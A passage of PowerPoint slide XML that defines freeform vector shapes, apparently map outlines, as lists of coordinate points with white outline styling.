                  <a:gd name="T32" fmla="*/ 330 w 507"/>
                  <a:gd name="T33" fmla="*/ 225 h 243"/>
                  <a:gd name="T34" fmla="*/ 295 w 507"/>
                  <a:gd name="T35" fmla="*/ 232 h 243"/>
                  <a:gd name="T36" fmla="*/ 273 w 507"/>
                  <a:gd name="T37" fmla="*/ 243 h 243"/>
                  <a:gd name="T38" fmla="*/ 260 w 507"/>
                  <a:gd name="T39" fmla="*/ 238 h 243"/>
                  <a:gd name="T40" fmla="*/ 230 w 507"/>
                  <a:gd name="T41" fmla="*/ 230 h 243"/>
                  <a:gd name="T42" fmla="*/ 200 w 507"/>
                  <a:gd name="T43" fmla="*/ 221 h 243"/>
                  <a:gd name="T44" fmla="*/ 159 w 507"/>
                  <a:gd name="T45" fmla="*/ 220 h 243"/>
                  <a:gd name="T46" fmla="*/ 129 w 507"/>
                  <a:gd name="T47" fmla="*/ 212 h 243"/>
                  <a:gd name="T48" fmla="*/ 106 w 507"/>
                  <a:gd name="T49" fmla="*/ 181 h 243"/>
                  <a:gd name="T50" fmla="*/ 78 w 507"/>
                  <a:gd name="T51" fmla="*/ 167 h 243"/>
                  <a:gd name="T52" fmla="*/ 47 w 507"/>
                  <a:gd name="T53" fmla="*/ 161 h 243"/>
                  <a:gd name="T54" fmla="*/ 48 w 507"/>
                  <a:gd name="T55" fmla="*/ 150 h 243"/>
                  <a:gd name="T56" fmla="*/ 50 w 507"/>
                  <a:gd name="T57" fmla="*/ 127 h 243"/>
                  <a:gd name="T58" fmla="*/ 31 w 507"/>
                  <a:gd name="T59" fmla="*/ 102 h 243"/>
                  <a:gd name="T60" fmla="*/ 6 w 507"/>
                  <a:gd name="T61" fmla="*/ 87 h 243"/>
                  <a:gd name="T62" fmla="*/ 0 w 507"/>
                  <a:gd name="T63" fmla="*/ 70 h 243"/>
                  <a:gd name="T64" fmla="*/ 21 w 507"/>
                  <a:gd name="T65" fmla="*/ 62 h 243"/>
                  <a:gd name="T66" fmla="*/ 38 w 507"/>
                  <a:gd name="T67" fmla="*/ 48 h 243"/>
                  <a:gd name="T68" fmla="*/ 68 w 507"/>
                  <a:gd name="T69" fmla="*/ 33 h 243"/>
                  <a:gd name="T70" fmla="*/ 101 w 507"/>
                  <a:gd name="T71" fmla="*/ 38 h 243"/>
                  <a:gd name="T72" fmla="*/ 124 w 507"/>
                  <a:gd name="T73" fmla="*/ 52 h 243"/>
                  <a:gd name="T74" fmla="*/ 144 w 507"/>
                  <a:gd name="T75" fmla="*/ 55 h 243"/>
                  <a:gd name="T76" fmla="*/ 160 w 507"/>
                  <a:gd name="T77" fmla="*/ 52 h 243"/>
                  <a:gd name="T78" fmla="*/ 162 w 507"/>
                  <a:gd name="T79" fmla="*/ 34 h 243"/>
                  <a:gd name="T80" fmla="*/ 176 w 507"/>
                  <a:gd name="T81" fmla="*/ 0 h 243"/>
                  <a:gd name="T82" fmla="*/ 209 w 507"/>
                  <a:gd name="T83" fmla="*/ 9 h 243"/>
                  <a:gd name="T84" fmla="*/ 227 w 507"/>
                  <a:gd name="T85" fmla="*/ 20 h 243"/>
                  <a:gd name="T86" fmla="*/ 235 w 507"/>
                  <a:gd name="T87" fmla="*/ 40 h 243"/>
                  <a:gd name="T88" fmla="*/ 275 w 507"/>
                  <a:gd name="T89" fmla="*/ 40 h 243"/>
                  <a:gd name="T90" fmla="*/ 308 w 507"/>
                  <a:gd name="T91" fmla="*/ 52 h 243"/>
                  <a:gd name="T92" fmla="*/ 336 w 507"/>
                  <a:gd name="T93" fmla="*/ 66 h 243"/>
                  <a:gd name="T94" fmla="*/ 366 w 507"/>
                  <a:gd name="T95" fmla="*/ 69 h 243"/>
                  <a:gd name="T96" fmla="*/ 391 w 507"/>
                  <a:gd name="T97" fmla="*/ 65 h 243"/>
                  <a:gd name="T98" fmla="*/ 408 w 507"/>
                  <a:gd name="T99" fmla="*/ 50 h 243"/>
                  <a:gd name="T100" fmla="*/ 428 w 507"/>
                  <a:gd name="T101" fmla="*/ 46 h 243"/>
                  <a:gd name="T102" fmla="*/ 451 w 507"/>
                  <a:gd name="T103" fmla="*/ 51 h 243"/>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507"/>
                  <a:gd name="T157" fmla="*/ 0 h 243"/>
                  <a:gd name="T158" fmla="*/ 507 w 507"/>
                  <a:gd name="T159" fmla="*/ 243 h 243"/>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507" h="243">
                    <a:moveTo>
                      <a:pt x="459" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36345" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3908" y="1937"/>
                <a:ext cx="969" cy="715"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 969"/>
                  <a:gd name="T1" fmla="*/ 684 h 715"/>
                  <a:gd name="T2" fmla="*/ 444 w 969"/>
                  <a:gd name="T3" fmla="*/ 643 h 715"/>
                  <a:gd name="T4" fmla="*/ 423 w 969"/>
                  <a:gd name="T5" fmla="*/ 658 h 715"/>
                  <a:gd name="T6" fmla="*/ 398 w 969"/>
                  <a:gd name="T7" fmla="*/ 613 h 715"/>
                  <a:gd name="T8" fmla="*/ 392 w 969"/>
                  <a:gd name="T9" fmla="*/ 586 h 715"/>
                  <a:gd name="T10" fmla="*/ 376 w 969"/>
                  <a:gd name="T11" fmla="*/ 541 h 715"/>
                  <a:gd name="T12" fmla="*/ 332 w 969"/>
                  <a:gd name="T13" fmla="*/ 523 h 715"/>
                  <a:gd name="T14" fmla="*/ 266 w 969"/>
                  <a:gd name="T15" fmla="*/ 543 h 715"/>
                  <a:gd name="T16" fmla="*/ 226 w 969"/>
                  <a:gd name="T17" fmla="*/ 545 h 715"/>
                  <a:gd name="T18" fmla="*/ 189 w 969"/>
                  <a:gd name="T19" fmla="*/ 539 h 715"/>
                  <a:gd name="T20" fmla="*/ 150 w 969"/>
                  <a:gd name="T21" fmla="*/ 515 h 715"/>
                  <a:gd name="T22" fmla="*/ 104 w 969"/>
                  <a:gd name="T23" fmla="*/ 497 h 715"/>
                  <a:gd name="T24" fmla="*/ 81 w 969"/>
                  <a:gd name="T25" fmla="*/ 459 h 715"/>
                  <a:gd name="T26" fmla="*/ 78 w 969"/>
                  <a:gd name="T27" fmla="*/ 433 h 715"/>
                  <a:gd name="T28" fmla="*/ 45 w 969"/>
                  <a:gd name="T29" fmla="*/ 399 h 715"/>
                  <a:gd name="T30" fmla="*/ 21 w 969"/>
                  <a:gd name="T31" fmla="*/ 376 h 715"/>
                  <a:gd name="T32" fmla="*/ 21 w 969"/>
                  <a:gd name="T33" fmla="*/ 361 h 715"/>
                  <a:gd name="T34" fmla="*/ 0 w 969"/>
                  <a:gd name="T35" fmla="*/ 338 h 715"/>
                  <a:gd name="T36" fmla="*/ 45 w 969"/>
                  <a:gd name="T37" fmla="*/ 305 h 715"/>
                  <a:gd name="T38" fmla="*/ 104 w 969"/>
                  <a:gd name="T39" fmla="*/ 271 h 715"/>
                  <a:gd name="T40" fmla="*/ 99 w 969"/>
                  <a:gd name="T41" fmla="*/ 211 h 715"/>
                  <a:gd name="T42" fmla="*/ 140 w 969"/>
                  <a:gd name="T43" fmla="*/ 186 h 715"/>
                  <a:gd name="T44" fmla="*/ 190 w 969"/>
                  <a:gd name="T45" fmla="*/ 135 h 715"/>
                  <a:gd name="T46" fmla="*/ 226 w 969"/>
                  <a:gd name="T47" fmla="*/ 110 h 715"/>
                  <a:gd name="T48" fmla="*/ 274 w 969"/>
                  <a:gd name="T49" fmla="*/ 184 h 715"/>
                  <a:gd name="T50" fmla="*/ 337 w 969"/>
                  <a:gd name="T51" fmla="*/ 222 h 715"/>
                  <a:gd name="T52" fmla="*/ 449 w 969"/>
                  <a:gd name="T53" fmla="*/ 262 h 715"/>
                  <a:gd name="T54" fmla="*/ 526 w 969"/>
                  <a:gd name="T55" fmla="*/ 267 h 715"/>
                  <a:gd name="T56" fmla="*/ 602 w 969"/>
                  <a:gd name="T57" fmla="*/ 226 h 715"/>
                  <a:gd name="T58" fmla="*/ 652 w 969"/>
                  <a:gd name="T59" fmla="*/ 196 h 715"/>
                  <a:gd name="T60" fmla="*/ 702 w 969"/>
                  <a:gd name="T61" fmla="*/ 170 h 715"/>
                  <a:gd name="T62" fmla="*/ 702 w 969"/>
                  <a:gd name="T63" fmla="*/ 137 h 715"/>
                  <a:gd name="T64" fmla="*/ 684 w 969"/>
                  <a:gd name="T65" fmla="*/ 91 h 715"/>
                  <a:gd name="T66" fmla="*/ 728 w 969"/>
                  <a:gd name="T67" fmla="*/ 61 h 715"/>
                  <a:gd name="T68" fmla="*/ 767 w 969"/>
                  <a:gd name="T69" fmla="*/ 3 h 715"/>
                  <a:gd name="T70" fmla="*/ 858 w 969"/>
                  <a:gd name="T71" fmla="*/ 97 h 715"/>
                  <a:gd name="T72" fmla="*/ 951 w 969"/>
                  <a:gd name="T73" fmla="*/ 134 h 715"/>
                  <a:gd name="T74" fmla="*/ 941 w 969"/>
                  <a:gd name="T75" fmla="*/ 204 h 715"/>
                  <a:gd name="T76" fmla="*/ 911 w 969"/>
                  <a:gd name="T77" fmla="*/ 249 h 715"/>
                  <a:gd name="T78" fmla="*/ 862 w 969"/>
                  <a:gd name="T79" fmla="*/ 270 h 715"/>
                  <a:gd name="T80" fmla="*/ 821 w 969"/>
                  <a:gd name="T81" fmla="*/ 300 h 715"/>
                  <a:gd name="T82" fmla="*/ 753 w 969"/>
                  <a:gd name="T83" fmla="*/ 338 h 715"/>
                  <a:gd name="T84" fmla="*/ 757 w 969"/>
                  <a:gd name="T85" fmla="*/ 296 h 715"/>
                  <a:gd name="T86" fmla="*/ 712 w 969"/>
                  <a:gd name="T87" fmla="*/ 331 h 715"/>
                  <a:gd name="T88" fmla="*/ 717 w 969"/>
                  <a:gd name="T89" fmla="*/ 361 h 715"/>
                  <a:gd name="T90" fmla="*/ 768 w 969"/>
                  <a:gd name="T91" fmla="*/ 368 h 715"/>
                  <a:gd name="T92" fmla="*/ 737 w 969"/>
                  <a:gd name="T93" fmla="*/ 391 h 715"/>
                  <a:gd name="T94" fmla="*/ 747 w 969"/>
                  <a:gd name="T95" fmla="*/ 455 h 715"/>
                  <a:gd name="T96" fmla="*/ 760 w 969"/>
                  <a:gd name="T97" fmla="*/ 495 h 715"/>
                  <a:gd name="T98" fmla="*/ 763 w 969"/>
                  <a:gd name="T99" fmla="*/ 512 h 715"/>
                  <a:gd name="T100" fmla="*/ 750 w 969"/>
                  <a:gd name="T101" fmla="*/ 541 h 715"/>
                  <a:gd name="T102" fmla="*/ 725 w 969"/>
                  <a:gd name="T103" fmla="*/ 588 h 715"/>
                  <a:gd name="T104" fmla="*/ 692 w 969"/>
                  <a:gd name="T105" fmla="*/ 621 h 715"/>
                  <a:gd name="T106" fmla="*/ 653 w 969"/>
                  <a:gd name="T107" fmla="*/ 641 h 715"/>
                  <a:gd name="T108" fmla="*/ 626 w 969"/>
                  <a:gd name="T109" fmla="*/ 650 h 715"/>
                  <a:gd name="T110" fmla="*/ 585 w 969"/>
                  <a:gd name="T111" fmla="*/ 662 h 715"/>
                  <a:gd name="T112" fmla="*/ 570 w 969"/>
                  <a:gd name="T113" fmla="*/ 665 h 715"/>
                  <a:gd name="T114" fmla="*/ 543 w 969"/>
                  <a:gd name="T115" fmla="*/ 658 h 715"/>
                  <a:gd name="T116" fmla="*/ 502 w 969"/>
                  <a:gd name="T117" fmla="*/ 627 h 715"/>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969"/>
                  <a:gd name="T178" fmla="*/ 0 h 715"/>
                  <a:gd name="T179" fmla="*/ 969 w 969"/>
                  <a:gd name="T180" fmla="*/ 715 h 715"/>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969" h="715">
                    <a:moveTo>
                      <a:pt x="567" y="715"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="560" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="685"/>
